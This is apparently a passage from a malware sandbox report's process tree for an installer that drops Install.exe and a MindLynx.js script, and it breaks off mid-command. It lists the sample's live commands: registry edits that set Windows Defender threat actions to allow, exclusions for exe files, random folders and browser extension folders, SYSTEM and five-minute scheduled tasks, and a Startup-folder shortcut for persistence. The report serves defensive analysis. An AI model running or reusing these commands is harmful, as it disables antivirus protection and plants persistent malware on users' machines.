                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                  13⤵
                                                                                    PID:3872
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                11⤵
                                                                                • Indirect Command Execution
                                                                                PID:2136
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                  12⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4360
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                    13⤵
                                                                                      PID:2036
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                  11⤵
                                                                                  • Indirect Command Execution
                                                                                  PID:2596
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                    12⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:4344
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                      13⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4284
                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                        14⤵
                                                                                          PID:4232
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                  10⤵
                                                                                  • Indirect Command Execution
                                                                                  PID:1788
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                    11⤵
                                                                                      PID:4908
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                        12⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4472
                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                          13⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4872
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "btVOVxCLuTmPtbGSGJ" /SC once /ST 20:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6220.tmp\Install.exe\" pU /nFBdidcPHO 385121 /S" /V1 /F
                                                                                    10⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:1748
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 912
                                                                                    10⤵
                                                                                    • Program crash
                                                                                    PID:4232
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                            6⤵
                                                                              PID:1600
                                                                        • C:\Windows\SysWOW64\choice.exe
                                                                          choice /d y /t 5
                                                                          4⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4232
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
                                                                      2⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:632
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
                                                                        3⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:4724
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & exit
                                                                      2⤵
                                                                      • Drops startup file
                                                                      PID:844
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS3062.tmp\Install.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\7zS3062.tmp\Install.exe pU /FqedidXuiZ 385121 /S
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Drops desktop.ini file(s)
                                                                    • Drops file in System32 directory
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:1532
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      2⤵
                                                                        PID:3608
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                          3⤵
                                                                          • Indirect Command Execution
                                                                          PID:2396
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                            4⤵
                                                                              PID:3648
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3432
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                            3⤵
                                                                            • Indirect Command Execution
                                                                            PID:316
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3952
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:4964
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                              3⤵
                                                                              • Indirect Command Execution
                                                                              PID:3200
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                4⤵
                                                                                  PID:1220
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                      PID:1556
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                  3⤵
                                                                                  • Indirect Command Execution
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2844
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                    4⤵
                                                                                      PID:3356
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                          PID:4284
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                      3⤵
                                                                                      • Indirect Command Execution
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4344
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2596
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Drops file in System32 directory
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1204
                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                            6⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:644
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3948
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:2528
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                          4⤵
                                                                                            PID:3476
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4076
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4356
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:444
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:2668
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1480
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1692
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:4164
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:816
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:3808
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4540
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:2252
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:1964
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                      3⤵
                                                                                                        PID:5040
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:2460
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                            PID:1124
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                              PID:2916
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                              3⤵
                                                                                                                PID:4864
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:4608
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:3128
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:4112
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1732
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:732
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:5052
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:1160
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:3720
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:4796
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:3012
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIWXmyCUdsxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIWXmyCUdsxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hFJcRoDcPVUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hFJcRoDcPVUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mbdcdpwRlyTVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mbdcdpwRlyTVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qCWABpGGrLbOkqZJqUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qCWABpGGrLbOkqZJqUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uefnUeatU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uefnUeatU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WSxuqkkUVHYAoNVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WSxuqkkUVHYAoNVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 